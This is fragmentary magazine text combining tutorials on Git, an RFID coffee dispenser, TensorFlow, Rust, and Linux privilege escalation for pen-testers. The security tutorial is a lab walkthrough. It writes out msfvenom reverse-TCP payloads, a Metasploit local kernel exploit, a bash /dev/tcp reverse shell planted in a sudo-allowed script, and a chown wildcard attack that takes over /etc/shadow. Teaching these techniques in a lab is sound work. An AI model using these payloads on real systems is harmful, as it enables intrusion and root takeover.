The next step is to commit our changes. Committing is something that we do periodically whenever we've made a fairly substantial number of changes. We cannot push any modifications we have made to the online repository
before we have committed them, but we might want to commit multiple times before we push changes online. Committing requires us to add a message detailing what the changes are, so it's a good idea to commit at any point that we've made enough changes to warrant writing such a message.
This time, run the command:

$ git commit -m 'Added the original text of the novel.'

to commit our most recent changes. If we run git status now, we see that novel.txt is no longer marked as a new file, because it is part of the current commit. However, we now get a message saying that we are ahead of 'origin/master' by one commit. This is because we have performed a commit on the local branch, but have not yet pushed it to the server.
Before we push any changes to the server, it's a good idea to run the following command:

$ git pull

This command will fetch or 'pull' any changes that have been made to the online branch. Had someone else modified the online repository, we would want to fetch their changes so that we could deal with any possible conflicts before pushing our version. In this case, since no one else is working on the repository, we should get the message Already up-to-date.
We can then run the following command to push our changes to GitHub.com:

$ git push -u origin master

We're prompted for our GitHub username and password; after we've given these, Git sends the new file. We can now reload the page for our repository on GitHub.com and we should see that the new file novel.txt now appears there alongside the README.

Gists
One thing you might come across if you use GitHub a lot are gists, normally hosted at gist.github.com. A gist is a particular type of GitHub repository, normally intended for sharing small snippets of code with other people, or storing them for your own use. The benefit of using a gist rather than a normal file-storage service such as Pastebin is that, since a gist is really a Git repository, GitHub stores the full version history of code.

Acting as a second author, clone another local copy of the repository, edit novel.txt to change Emma's age, and commit the change:

$ git commit -a -m "Changed Emma's age to 17."

The -a flag to git commit tells it to add all new changes to the current commit. This saves us having to run git add before running git commit as we did before. We can then run git push -u origin master again to push the changes online.
The second author has decided to make some more drastic changes to the first paragraph. Inside the second local copy of the repository, open the file novel.txt and replace the first paragraph with the following:

So okay, you're probably thinking, "Whatever, is this like a Noxema ad?" But I actually have a bare normal life for a teenage girl.

Run git commit -a -m 'Changed the first paragraph.' in order to commit these changes. Before we try and push them to GitHub.com, let's run the command git pull to fetch any new changes from the repository. When we run this command, we get the following error.

CONFLICT (content): Merge conflicts in novel.txt
Automatic merge failed; fix conflicts and then commit the result.

We're getting this message because our current commit contains modifications that cannot be reconciled with the modifications that have been made to the master branch since we last pulled the code from it. To get a better idea of what's going on, let's open the file novel.txt in a text editor. When we open it and move to line 48, we discover that Git has changed the file so that it now displays the conflicts in such a way that we can choose ourselves how to resolve them. Figure 2 shows the relevant part of the code. Wherever it finds a conflict between the two versions, Git has put both versions into the file, marked up so that we can decide how to handle the merge: Git cannot decide itself what the best course of action is, so you should. You might want to choose one or the other of the two passages, or you could decide to incorporate changes from both – perhaps by using the more modern introduction, but changing the word 'teenage' to '17-year-old'. When you've finished making your changes, save and close the file, and then run a git commit command to commit the changes, followed by git push -u origin master to push them to the repository online.

Figure 2 Git has its own special format for displaying merge conflicts concisely within files. Some editors, such as Atom, can recognise this, and make it easy to choose one branch or another
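For reference, the conflict markers that Figure 2 shows take this general form; the bracketed lines stand in for the real paragraphs from the novel:

<<<<<<< HEAD
(the paragraph as it stands in our local branch)
=======
(the conflicting paragraph fetched from origin/master)
>>>>>>> (name or hash of the incoming commit)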
Note that if we go back to the first local repository and
run git pull, Git will now fetch the new, merged version
from the server, and will not register a merge conflict,
even though the current contents of the branch conflict
with what is online. The reason is that the online branch
is now a ‘commit ahead’ of this local branch – that is, it’s
considered to be a more up-to-date version of what’s in
our first local branch.
Using Git to undo changes
Sometimes when we are working on a project we end up making changes that we decide we don't want.
Now suppose that we wake up the next day and realise that the new 'modern' opening paragraph doesn't really fit in with the rest of the novel. We want to return to a previous version of the project. To do this, we should first run a command such as git log to list the recent commits; its output contains entries like the following:

commit 2e68c483abe7db1cd87627ed2092cd24b085f0e0
Author: johngowers <[email protected]>
Date: Wed Mar 21 19:49:46 2018 +0000

    Resolved merge conflict.

The long hexadecimal code identifies this merge conflict. In order to produce the commit that reverts it, we run the following command – replace the hex code with the one corresponding to the merge conflict in your setup:

$ git revert -m 1 2e68c483abe7db1cd87627ed2092cd24b085f0e0

Here, the -m 1 is specific to reverting a merge conflict (rather than some other commit). The number 1 refers to which of the two conflicting branches should be considered the main one. Git will pop up a text editor, where we write our revert message, before saving and exiting to trigger the reversion. Now, it's time to revert the other two changes. We can do this with:
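As a general sketch (not necessarily the tutorial's exact command), git revert accepts more than one commit at a time, so the remaining two changes can be reverted with something like the following, replacing the placeholders with the hashes git log reports:

$ git revert <hash-of-first-change> <hash-of-second-change>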
Tutorial Arduino: Coffee Dispenser
part one
for the FIFA World Cup, and in universities worldwide.
However, the encryption provided by some of these
cards – Crypto-1 – has been compromised, so cards
such as the Mifare Classic have fallen out of favour in
applications where security matters. Despite this, there
are quite a few still in use, and cards and reader kits that
can easily be used with an Arduino or Raspberry Pi can be
picked up online for a few pounds. Regardless of the card
your workplace uses, you can still read card IDs without
needing to decrypt the data.
IDE under Sketch > Include library > Manage libraries. Search for 'MFRC522' and press Install; you can also do this in the online editor using the Library Manager.
Open the example sketch 'DumpInfo' that comes with the library. This will be the skeleton around which you will write the sketch for the coffee pod dispenser. The sketch begins by including the SPI and MFRC522 libraries and defining the reset (RST_PIN) and slave select (SS_PIN) pins. Modify the top of the sketch to match your setup; don't worry about the rest of the SPI pins – we've used the default configuration. The sketch then goes on to initialise an MFRC522 object using:

MFRC522 mfrc522(SS_PIN, RST_PIN);

and, in setup, begins connection to the RFID reader and requests information about the reader. In loop there are then two if conditions which return the program to the beginning of loop unless a new card is placed in front of the reader, and the reader can establish a connection with the card and read data from it. If data is read, the sketch finishes by executing:

mfrc522.PICC_DumpToSerial(&(mfrc522.uid));

writing all card data to serial (your computer) and automatically terminating connection with the card.
Open the Serial Monitor from the Arduino IDE and scan a card in front of the reader – you can use the one provided with the kit and then consider trying others. It should begin with a unique identifier, the card model, and then lots of text, broken into blocks. This is the card data which can be used to store data, such as employee number or account balance. If your Arduino says that authentication failed, your card is encrypted.

Identify the card
In order for the user to order a coffee, they'll need to flash their RFID card in front of the reader, from which we can extract information about the card – and therefore the card holder. With the Mifare Classic series of cards, the data stored takes the format of header information, followed by blocks of data, which in some cases can be encrypted. If you plan to issue users with your own cards, you can make use of the other example sketches to write data to certain blocks on the card. You can encrypt them using the Crypto-1 algorithm built in to the cards and the Arduino library – although, as mentioned earlier, this provides little security and is no longer used on newer Mifare card models.
If you intend to use employee identification cards for this system, as we will demonstrate, it will be much harder (and perhaps a bad idea) to write to blocks on the card. For one thing, you definitely don't want to be overwriting information already present on the card – your employer might be a bit peeved if they catch you 'tampering' with it! An easy way around this, although not without its drawbacks, is to just read the unique identifier (UID) written to the card by the manufacturer. While this is a quick and dirty way of identifying the user, it's a bad idea if you care about security: it is possible to clone these cards and overwrite the UID field. In principle, anyone could pretend to be someone else (if they know a UID for members of your coffee club) and get a free coffee from your machine – so that'd be no better than an honesty jar.
However, if you're reasonably confident that employees' cards will be protected by the user and not left lying around, just grabbing the UID should be sufficient. If you are still worried, you could always get the user to input a PIN code before issuing a pod and charging their account. Luckily for us, the MFRC522 object stores the UID separately as a byte array, so we can access it using mfrc522.uid.uidByte – and similarly for the size. If you would prefer the card ID in hexadecimal, open the ReadNUID example and steal the printHex function from the bottom. You can then call:

printHex(mfrc522.uid.uidByte, mfrc522.uid.size);

Using Python databases
There are Python libraries which enable you to interface with and manage databases. These libraries act as drivers for databases such as SQLite, PostgreSQL and MySQL, and can therefore be manipulated in a Python script. This is a good route if a web application is suitable for managing your coffee club and letting new users register.

Below Use a breadboard to make wiring the RFID reader to the Arduino easier
or not coffee should be served to a user. The aim of the
rest of this tutorial is to establish whether or not a user
is a member of the club, if they have enough money
associated with their ID, and then, if the user orders a
coffee, to subtract a preset amount of money after the
pod has been dispensed. Instinctively, one might consider
using a database to manage users and their accounts,
and languages such as Python – which, as we’ve seen
in previous tutorials, can also be used to communicate
easily with the Arduino – have ways of doing this. Python
can even be integrated with a MySQL database, which
enables us to create a website where a user or manager
can manage an account. If this is something that
interests you, we recommend you go for it, but it’s a little
outside the scope of this tutorial.
Connect a Raspberry Pi to the Arduino Mega by USB;
an adaptor might be required to convert to Micro-USB. On
the Pi Zero W, we use the adaptor to connect to the USB
terminal, and power both the Raspberry Pi and Arduino
through the Pi’s Power USB port. We chose the Pi Zero W
as it's low-cost and has built-in Wi-Fi, thus enabling us to log in remotely.

Check against known users
We can now begin creating our pseudo-database of coffee club members and adding money to accounts. As stated before, this isn't the most effective way of managing the club, but all we now need to do is to create a dedicated folder where we can store user accounts.
When a user swipes their card in front of the reader, the Pi receives a UID as a string. The Pi can then hash the UID and check the Python dictionary to see if that string exists. If the ID doesn't exist, the script can then create a file, using the hashed ID as the filename, which the user can then manually open to enter their name.
Each time the Pi boots up, it can form the dictionary from this folder of hashed UIDs, mapping the UID to the contents of its file – the name of the card holder. If a hashed UID is found to already exist in the dictionary, the script can use the mapping to convert to a username, open their account file – created when the user registers – and find out how much money they have in their account. If they have money on their account, the Pi can tell the Arduino to dispense a coffee pod.

Above Connecting the Arduino to the Pi may require a USB adaptor, depending on the model
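A minimal sketch of that boot-time step in Python might look like the following; the folder path and the choice of SHA-256 are assumptions for illustration, not taken from the tutorial:

import hashlib
import os

ACCOUNTS_DIR = "/home/pi/coffee_accounts"  # hypothetical folder of per-member files

def hash_uid(uid_string):
    """Hash the UID string the Arduino sends over serial."""
    return hashlib.sha256(uid_string.encode()).hexdigest()

def build_member_lookup():
    """Map each hashed UID (the filename) to the name stored inside that file."""
    members = {}
    for fname in os.listdir(ACCOUNTS_DIR):
        with open(os.path.join(ACCOUNTS_DIR, fname)) as f:
            members[fname] = f.read().strip()
    return members

members = build_member_lookup()
# Later, when a card is swiped: members.get(hash_uid(uid)) tells us who it belongs to.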
Tutorial Computer Security

Security: Privilege escalation techniques
Learn how attackers may gain root access by exploiting misconfigured services, kernel bugs and more

Toni Castillo Girona
Toni holds a degree in Software Engineering and an MSc in Computer Security and works as an ICT research support expert in a public university in Catalonia (Spain). Read his blog at http://disbauxes.upc.es

Resources
Post exploitation repository http://bit.ly/lud_postexp
Metasploit local exploit suggester http://bit.ly/lud_suggest
LinEnum http://bit.ly/lud_linenum
Linux exploit suggester http://bit.ly/lud_suggest2
Exploit database http://bit.ly/lud_exploit
Vulners scanner http://bit.ly/lud_vulners
Lynis https://cisofy.com

So far our tutorials in this series have been dealing with different techniques to find and exploit well-known vulnerabilities in order to get a foothold into a system. Most of the time, however, that initial foothold won't get you a root shell. That's because some of these services may run using a non-privileged user account (for example, Apache's 'www-data' user). As a pen-tester, your next step is obvious: to escalate privileges, or priv esc. To some, priv esc is kind of an art, and we agree. Whatever your thoughts about it, priv esc can be achieved by abusing misconfigured services, exploiting vulnerable programs, taking advantage of kernel bugs, or performing social engineering attacks. There are some tools that will assist you throughout this process (see Resources). The Metasploit framework, for instance, ships with a bunch of local exploits for some well-known vulnerable programs (see modules/exploits/linux/local). Sometimes it's tempting to execute a local kernel exploit to get root, but we strongly discourage you from doing so because these exploits tend to make the system unstable and sometimes they may even crash it. Without further ado, are you ready to delve into the passionate world of privilege escalation techniques? Read on!

Get root through Ring 0
We've already mentioned that getting root by exploiting a kernel flaw is dangerous, so now it's time for a demonstration. Download Ubuntu 16.04.4 LTS from http://releases.ubuntu.com and install it on a VM with at least two CPUs. Add a new 'Host Only' network device to be able to communicate with the VM directly (for VirtualBox, see http://bit.ly/lud_vb). Don't tick the 'Download updates while installing Ubuntu' option. Boot it up and install a vulnerable kernel: apt-get install linux-image-4.4.0-62-generic. This kernel version is known to have a 'Use-After-Free' flaw (see http://bit.ly/lud_flaw). Now reboot into this new kernel – press Shift during the booting process to access the GRUB menu. Don't install any updates. If you were an attacker already connected to this machine as a non-privileged

Above Get used to auditing your own computers before someone else does (uninvited, that is!)
user, you would be looking for possible priv esc vectors.

Figure 1 Identifying priv esc vectors won't always be that easy – and that's a relief

You will be that attacker now; install Metasploit on your computer (see http://bit.ly/lud_nightly) and generate a Meterpreter payload for Linux x64: msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<YOURIP> LPORT=4444 -f elf -o m.e. Upload this file to your VM, using SSH for example, set its execute bit and run it: chmod +x m.e; ./m.e&. On your computer, start msfconsole with a new handler to deal with remote sessions by typing this one-liner:
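A handler matching the payload above can be started in a single line along these lines (a sketch; adjust LHOST and LPORT to your setup):

msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter_reverse_tcp; set LHOST <YOURIP>; set LPORT 4444; run -j"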
a list of GNU/Linux local exploits by executing ls -l /opt/metasploit-framework/embedded/framework/modules/exploits/linux/local/. As you can see, there's a working exploit for ntfs-3g. Use this module, set its payload (a stageless meterpreter reverse TCP payload will do), your IP and a new listening port (remember that the VM is still connected to your port 4444/tcp):

use exploit/linux/local/ntfs3g_priv_esc
set PAYLOAD linux/x64/meterpreter_reverse_tcp
set LHOST <YOURIP>
set LPORT 4445

Because this is a local exploit, it requires an already established session. Use the SESSION_ID of your current meterpreter session: set SESSION <ID>. This module will upload some files to the target computer and it will compile the exploit right there, so make sure you set a valid working directory with write permissions: set WritableDir /home/<USER>, where <USER> is the user you are logged in as. Now, before executing the exploit, make sure to check if the target is vulnerable: check. Finally, execute the exploit in order to get root: exploit. You will see a new reverse TCP session being established to your computer and msfconsole will start interacting with it right away. Check if you are root now: getuid (see Figure 2).

Figure 2

You can use vulners-scanner too (see Resources) and execute it directly on the target machine. You can do this from your non-privileged meterpreter session. Background your current privileged session now: background. Get back to your previous non-privileged meterpreter session: session -i <ID>. Now spawn a new shell and download vulners-scanner: wget https://github.com/vulnersCom/vulners-scanner/archive/master.zip. Unzip it and execute it: unzip master.zip; cd vulners-scanner-master; ./linuxScanner.py. You will get the same list of vulnerable packages as with the web front-end.
On the VM, install Apache and PHP: apt-get install apache2 libapache2-mod-php. Next, create the .scripts directory in /var/www/html with: mkdir /var/www/html/.scripts. Add the following lines to the /etc/apache2/sites-available/000-default.conf file:

<DirectoryMatch "^\.|\/\.">
Order allow,deny
Deny from all
</DirectoryMatch>

Restart Apache: /etc/init.d/apache2 restart. Now create a new file called purge.sh:

#!/bin/bash
rm -rf /tmp/*

Save this file to /var/www/html/.scripts/ and set its execute bit: chmod +x purge.sh. Finally, make sure to set www-data as the owner of /var/www/html with: chown -R www-data:www-data /var/www/html. Add the following entry to /etc/sudoers: www-data ALL=(ALL) NOPASSWD: /var/www/html/.scripts/purge.sh. This script will be executed by www-data at some point. No one is supposed to run this command directly from the website, of course, thanks to the <DirectoryMatch> directive. On your computer, kill any established meterpreter session: sessions -K. Then kill all your listeners too: jobs -K.
Now, let's imagine you are an attacker who has been able to exploit a flaw on the website and you have gained a non-privileged PHP meterpreter session. Generate a new payload now: msfvenom -p php/meterpreter/reverse_tcp LHOST=<YOURIP> LPORT=4444 -o m.php. Upload this file to the VM and save it to /var/www/html/. On your computer, change the payload used by the multi/handler listener accordingly: use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp. Now run the module: run -j. Use your favourite browser to access the payload just uploaded by navigating to http://YOURVMIP/m.php. You will get a meterpreter session with the same privileges as www-data.
Interact with this session and spawn a new shell (use the Python trick again) to run the command sudo -l; this will list the allowed sudo commands for www-data. See? You now know that you can run the purge.sh script without a password! It so happens that this script is

Privilege escalation in Windows
Eleven Paths has developed a Python framework for attacking and mitigating all the well-known techniques to bypass Windows UAC, called Uac-A-Mola (see https://github.com/ElevenPaths/uac-a-mola). This framework implements the techniques known to date: DLL hijacking, CompMgmtLauncher.exe, Eventvwr.exe and fodhelper. UAC exploitation aside, the same principles as with GNU/Linux distros apply here as well.
It so happens that this script is owned by www-data, so it's a piece of cake to add something more interesting than just rm -rf to it; terminate this channel with Ctrl+C and use the edit command to edit this file: edit .scripts/purge.sh. Now add the following lines to the file (replace <YOURIP> with your IP address):

/bin/bash -c '/bin/bash -i > /dev/tcp/<YOURIP>/4445 0<&1 2>&1' &
disown $!
exit $?

Save it (:wq!). Background this session and start a new listener using the reverse shell payload: background; set PAYLOAD linux/x64/shell_reverse_tcp; set LPORT 4445. Execute it: run -j. Now get back to your non-privileged session: sessions -i <ID>. Spawn a new shell (don't forget to use Python again!) and run the script via sudo: sudo /var/www/html/.scripts/purge.sh. A new reverse-TCP session will be established; kill this channel (Ctrl+C) and background the current session: background. Finally, interact with the new session just established: sessions -i <ID>. Run the id command; you are root now!

You can use LinEnum to help find security weaknesses in a system such as misconfigured files. It's a standalone bash script that you can upload to your target computer using a non-privileged session and run. It will check for sudo access without a password, locate setuid/setgid binaries, and so on (see Resources). Get back to your non-privileged session, spawn a new shell and download LinEnum.sh: cd .scripts; wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh. Set its execute bit: chmod +x LinEnum.sh. Finally, run it and pipe its output to a file.

what next?
Dissect malicious Windows binaries with Any.Run

1 Create your account
Visit https://app.any.run/#register and create a new account, with any email address you like. Using the free plan only gives you access to a Windows 7 32-bit sandbox.

2 Upload your malicious binary to the sandbox
Grab your malicious program and send it to the sandbox. You can use the New Task icon on the left (+) to upload a local file, or you can paste a URL holding the binary. Only files up to 16MB are allowed.

3 Let it run
Wait for a while until the sandbox is ready. The system will start gathering some useful information about the program: network connections, registry changes, malicious behaviour, and so on. You are free to interact with the system at any time.

You know what wildcards are; you probably use them on a regular basis. Most of us do. When used loosely, bad things can happen. As a matter of fact, things can turn wild (see http://bit.ly/lud_privesc). So let's imagine that a sysadmin has created the following shell script:

#!/bin/bash
cd /var/www/html && chown www-data:www-data *

Save this file to /usr/local/bin/update-web-owners.sh on your VM. Set its execute bit: chmod +x /usr/local/bin/update-web-owners.sh.

Get root through wildcards
This script has been added to cron to be executed every five minutes as root; add the following line to /etc/crontab on your VM:

*/5 * * * * root /usr/local/bin/update-web-owners.sh

Get back to your computer and, from a non-privileged meterpreter session, create a new file called ref.php (don't forget to spawn a shell first): touch ref.php. This file will be created with www-data as its owner, of course. Open a new terminal on your computer, execute vi and save the new empty file (:w --reference=ref.php). Then upload this file to the VM using your meterpreter session (first terminate the active channel with Ctrl+C): upload --reference=ref.php. Spawn a new shell once again and make a symbolic link to /etc/shadow: ln -s /etc/shadow shadow. Wait for a while until the cron job executes. Have a good look at /etc/shadow now… and start panicking! Now /etc/shadow is owned by www-data.
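Pulling those wildcard steps together, here is a minimal sketch of the attacker's side run from a shell as www-data inside /var/www/html. The article uploads the oddly named file over meterpreter; a plain shell redirect, shown here, achieves the same thing:

cd /var/www/html
touch ref.php                  # owned by www-data; chown will copy its ownership
ln -s /etc/shadow shadow       # symlink the root cron job will happily chown
> '--reference=ref.php'        # filename that the * wildcard turns into a chown option
# wait up to five minutes for the cron job, then:
ls -l /etc/shadow              # should now be owned by www-data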
Tutorial TensorFlow: Image Recognition
import tensorflow as tf

hello_test = tf.constant('Hello from TensorFlow!')
sess = tf.Session()
print(sess.run(hello_test))
need to be applied to the data. All these processes and relationships are combined to define a dataflow graph. TensorFlow then acts as the engine that traverses these graphs and executes all the operations that have been defined. These features are accessible through the low-level API in TensorFlow, but most people don't need to work with that much detail, so there is a higher-level API that provides data import functions to manage creation of the data structures from many common data file formats. Then there are a series of functions called estimators. These estimators create entire models, and their underlying graphs, so that you can simply run the estimator to do the data processing that is needed.

Left: A neural network consists of an input layer, a number of intermediate (hidden) layers, and an output layer
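As a flavour of that higher-level API mentioned above – this is a sketch, not code from the tutorial – the pre-built DNNClassifier estimator can be trained on some toy data in a handful of lines:

import numpy as np
import tensorflow as tf

# one numeric feature named 'x' with four values per example
feature_columns = [tf.feature_column.numeric_column('x', shape=[4])]
classifier = tf.estimator.DNNClassifier(feature_columns=feature_columns,
                                        hidden_units=[10, 10], n_classes=3)

# random stand-in data; a real model would use the data import functions instead
train_input = tf.estimator.inputs.numpy_input_fn(
    x={'x': np.random.rand(100, 4).astype(np.float32)},
    y=np.random.randint(0, 3, size=100), shuffle=True)
classifier.train(input_fn=train_input, steps=100)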
Inception-v3
One of the tasks for which TensorFlow has shown its
usefulness is image recognition, and therefore a lot of
work has been done to improve its performance in this
area. When you start developing your own algorithms, the
work done in the image-recognition estimators would be
well worth your time to investigate. One family of image
recognition estimators is called Inception, with the most
current release being version 3.
The Inception models were trained using a data set called ImageNet, put together in 2012 to act as a standard set to test and compare image-recognition systems. It contains more than 14 million URLs to images that were annotated (by humans) to indicate the objects pictured; there are more than 20 thousand ambiguous categories, with each category, such as 'roof' or 'mushroom', containing several hundred images.
Luckily, Inception-v3 is a fully trained model that you can download and use to experiment with. Once you have TensorFlow installed, download Inception from the GitHub repository with the following commands:

git clone https://github.com/tensorflow/models.git
cd models/tutorials/image/imagenet

In this folder, you'll find the Python script classify_image.py. Assuming you haven't run this script before, and haven't downloaded the model data at some other time, it will start by downloading the file inception-2015-12-05.tgz so that it has the model data. If you have already downloaded the model, you can indicate this to the script with the command line option --model_dir to specify the directory where it's stored. Then to have it classify your own images, you can hand them in with the command line option --image_file. To test it, you can use the default image of a panda. When you run it, you should get output like the following.

python ./classify_image.py
giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca (score = 0.89107)
indri, indris, Indri indri, Indri brevicaudatus (score = 0.00779)
lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens (score = 0.00296)
custard apple (score = 0.00147)
earthstar (score = 0.00117)

As you can see, this outputs the top five matches for what TensorFlow thinks your image might be, together with a confidence score (in case you were wondering, an earthstar is a type of fungus!). If you want, you can change the number of returned matches with the command line option --num_top_predictions.

Visualising with TensorBoard
When working with networks and models, it can become difficult to figure out what is actually happening. To help, the developers have provided a tool called TensorBoard to help visualise the learning that is being processed. In order to use it, you need to have your code generate summary data, which can then be read by TensorBoard to produce detailed information for your model.
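Generating that summary data can be as simple as attaching a FileWriter to your session – a minimal sketch, with an assumed log directory:

import tensorflow as tf

with tf.Session() as sess:
    # write the current graph so TensorBoard can draw it;
    # training code would also call writer.add_summary() for each step
    writer = tf.summary.FileWriter('/tmp/retrain_logs', sess.graph)
    writer.close()

# then, from a terminal: tensorboard --logdir /tmp/retrain_logs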
Tune the net
While the Inception model is very good, it's designed to be as general as possible and to be able to identify a wide range of categories. But you may want to tune the model to be even better at identifying some smaller subset of types of images. In these cases, you can reuse the bulk of the Inception model and just replace the last layer of the neural network to be specific for your new image category. In the main TensorFlow GitHub repository that you need to download, there is a Python script that gives an example of how to retrain the Inception model, which you can run with the following example code.

python tensorflow/examples/image_retraining/retrain.py --image_dir ~/my_images

This script takes all of the images in the directory my_images and retrains the model using each image. Even this simple retraining process can still take 30 minutes or more. If you were to do a full training of the model, it could take a huge number of hours. There are several other options available, including selecting a different model to act as a starting point. There are other smaller models that are faster, but not as general. If you're writing a program to be run on a low-power processor, such as a phone app, you may decide to select one of these instead.

Using TensorFlow Mobile
When you have a model trained and are using it in some project, you have the ability to move it onto what may seem like underpowered hardware by using the TensorFlow Mobile libraries available at the TensorFlow site. This can move very intensive deep-learning applications out to devices such as smartphones or tablets.

Training on new data
While the above example may be fine for the majority of people, there may be cases where you need more control than this. Fortunately, you can manually manage the retraining of your model. The first step is to load the data for the model; the following code lets you do this.

graph = tf.Graph()
with graph.as_default():
    with tf.gfile.FastGFile('classify_image_graph_def.pb', 'rb') as file:
        graph_def = tf.GraphDef()
        graph_def.ParseFromString(file.read())
        tf.import_graph_def(graph_def, name='')

This loads the model and creates a new graph object. The graph is made up of several layers, all leading to a final output layer.

last_layer = graph.get_tensor_by_name('pool_3:0')

This final layer is what does the final classification and makes the ultimate decision as to what it thinks your image is. At this point, you can process your specialised images to create a new final layer. There are several steps required in order to preprocess the images, and then train a new final layer, which can be quite tedious to carry out – but you can shorten the process by using a useful wrapper known as TF-Slim. As you can see, we have only touched the code necessary in the most cursory way in the material above. We haven't had the space available to dig into much of the detail that you require in order to get any work done, and indeed this is a well-known complaint people have with TensorFlow. To help alleviate this issue you can use that wrapper layer of code, TF-Slim, to minimise the amount of code that you need in order to get some useful work done. TF-Slim is available in the contrib portion of the TensorFlow installed package, and you can import it with the following code:

import tensorflow.contrib.slim as slim

With the TF-Slim module loaded, a lot of the boilerplate code that needs to be written when working in TensorFlow is wrapped and taken care of for you. In TF-Slim, models are defined by a combination of variables, layers and scopes. In regular TensorFlow, creation of variables requires quite a bit of initialisation on whichever device the data is being stored and used on. TF-Slim wraps all of this so that it's simplified to become a single function call. For example, the following code creates a regular variable containing a series of zeroes.

my_var = slim.variable('my_var', shape=[20, 1],
    initializer=tf.zeros_initializer())
regular_variables_and_model_variables = slim.get_variables()

Layers are wrapped in the same way; the following code creates a single convolutional layer.

input = ...
net = slim.conv2d(input, 128, [3, 3], scope='conv1_1')

Below: There's a complete tutorial available as an IPython notebook in the models repository for TensorFlow
TF-Slim also includes 13 other built-in options for layers, including fully connected and unit norm layers. It even simplifies creating multiple layers with a repeat function. For example, the following code creates three convolutional layers.

net = slim.repeat(net, 3, slim.conv2d, 256, [3, 3], scope='conv3')

This makes the task of retraining a given model to be more finely tuned much easier. You can use these wrapper functions to create a new layer with only a few lines of code and replace the final layer of an already built model. Luckily, there is a very good example of how you can do this, which is available within the models section of the TensorFlow source repository at GitHub. There is a complete set of Python scripts written to help with each of the steps we've already discussed. There are scripts to manage converting image data to the TensorFlow TFRecord data format, as well as scripts to automate the retraining of image recognition models. There is even an IPython notebook, called slim_walkthrough.ipynb, that takes you through the creation of a new neural network, training it on a given dataset, and the final application of the neural network on production data.

Above: TensorFlow has a layered structure, building up from a core graph execution engine all the way up to high-level estimators (the diagram's layers, bottom to top: CPU, GPU, Android and iOS targets; the TensorFlow Distributed Execution Engine; the Python and C++ front-ends; Layers for building models; Estimator and Keras Model for training and evaluating models; and Canned Estimators – 'models in a box')
Training a new layer
Once you have a new layer constructed, or perhaps you have created an entirely new neural network from scratch, you still have to train this new layer. In order to retrain a given network, you need to create a starting point with the following code.

model_path = '/path/to/pre_trained_on_imagenet.checkpoint'
variables_to_restore = slim.get_variables_to_restore(...)
init_fn = assign_from_checkpoint_fn(model_path, variables_to_restore)

Once you have this starting point, you can start the retraining with the code below.

train_op = slim.learning.create_train_op(...)
log_dir = '/path/to/my_model_dir/'
slim.learning.train(train_op, log_dir, init_fn=init_fn)

You can then run this newly created model to get it to do actual work. To help, the TF-Slim code repository includes a script called evaluation.py to help you do this processing step. If you have something specific that you need to do, you can use this script as a starting point to write your own workflow scripts.

Performance implications
The developers behind TensorFlow have put a lot of work into making the final, trained models fairly snappy in terms of performance. This is one of the reasons why deep learning and neural networks have been exploding in popularity recently. There is still one area that has performance problems, however: the training of the models in the first place. For example, training the Inception image-recognition model takes weeks of processing time. This is why quite a bit of development time has been put into including GPU support for this stage of TensorFlow usage – and it's also why you should use a pre-trained model, such as the Inception model we've been discussing, whenever you have the opportunity.
The Inception-v3 model took weeks to train, even with 50 GPUs crunching the network data. When you are doing your own training, there are a few things you can do to help with performance. One of them is to try to bundle your file I/O into larger chunks. Accessing the hard drive is one of the slowest processes on a computer; if you can take multiple files and combine them into larger collections, reading them is made more efficient. The second option you have is to use fused operations in the actual training step. This takes multiple processing operations and combines them into single fused operations, to minimise function-call overhead.
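Bundling image files into a single TFRecord container – the format the repository's conversion scripts produce – only takes a few lines. A rough sketch (the file names are placeholders):

import tensorflow as tf

image_paths = ['panda.jpg', 'indri.jpg']  # placeholder file names
writer = tf.python_io.TFRecordWriter('images.tfrecord')
for path in image_paths:
    with open(path, 'rb') as f:
        raw = f.read()
    # store each image as one Example record with a single bytes feature
    example = tf.train.Example(features=tf.train.Features(feature={
        'image_raw': tf.train.Feature(bytes_list=tf.train.BytesList(value=[raw]))}))
    writer.write(example.SerializeToString())
writer.close()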
Where next?
We've only been able to cover the process of image recognition and retraining of neural networks in the most superficial way in this tutorial. There are a large number of complicated steps involved in working with these types of models. My hope is that this short article has been able to highlight the overall concepts, and includes enough external resources to help point you to sources of the details you would need to be able to add this functionality to your own projects.
Tutorial Introduction to Rust
Rust: An introduction to
safe systems programming
Learn some of the safety features inside one of the best-loved programming languages today

John Gowers
John is a
university tutor
in Programming
and Computer
Science. He likes
to install Linux
on every device
he can get his
hands on and
has extensive
programming
experience.
Resources
Rust and Cargo installation (details are included in the article)
Above If you’re familiar with C, it shouldn’t take long to get to grips with Rust
Rust, in a nutshell, is a safe C. Developed in the last 10-12 years under the sponsorship of Mozilla, it quickly took on a number of safety features that are directly useful within software engineering projects. At its heart, it's a systems programming language just as C is, but it combines low-level access to the machine with elegant features, such as strong typing and ownership, that help Rust programmers avoid bugs and memory leaks much more effectively than they could in C – or in similar languages such as C++.
Today, Rust is hugely popular, owing to its elegance and robustness. In fact, it was named the most-loved language in the Stack Overflow developer survey in 2016, 2017 and 2018.

Getting started
We'll assume that you know a bit about systems programming in C/C++. Much of the syntax of Rust is the same as that of C; where there are differences, they are for the purpose of making the language safer and less prone to error than C, directly targeting common problems such as null pointers and memory leaks. We hope that you'll gain some appreciation of what Rust does and how it can help us catch bugs much earlier than other languages.
To start, we need to install the Rust compiler to our system. In order to download it manually, you can visit https://sh.rustup.rs, which will automatically download a shell script, rustup-init.sh. Running this script will install Rust on your system. You can perform installation in a single command as follows:

$ curl https://sh.rustup.rs/ | sh

Alternatively, your distribution's package manager might have a Rust package on it already. If that's the case, it's a good idea to install Rust using it. This will give you a more robust installation, and will help you keep track of Rust on your system.
We'll start with a simple "Hello world" program. Open a command window, create a folder somewhere on your system in order to hold the code, and navigate to it. We'll also need to fire up a text editor to write our code. Create a file called hello.rs inside the folder we've just created, and add the following code to it.
fn main() {
    println!("Hello, world!");
}

If you're used to C you'll notice some similarities, but a number of differences as well. To start, notice that the function that runs when the program starts is called main, as it is in C, and that the syntax is broadly the same. Some differences include the keyword fn to declare a function (which is not part of C) and the exclamation mark ! after the function println. This exclamation mark in fact means that println is not a normal function but a macro, but we don't need to worry about that for now.
Go into the command window, and type the following to compile and run your program.

$ rustc hello.rs
$ ./hello
Hello, world!

Figure 1: number data types
Size                                  Signed type    Unsigned type
8-bit integer                         i8             u8
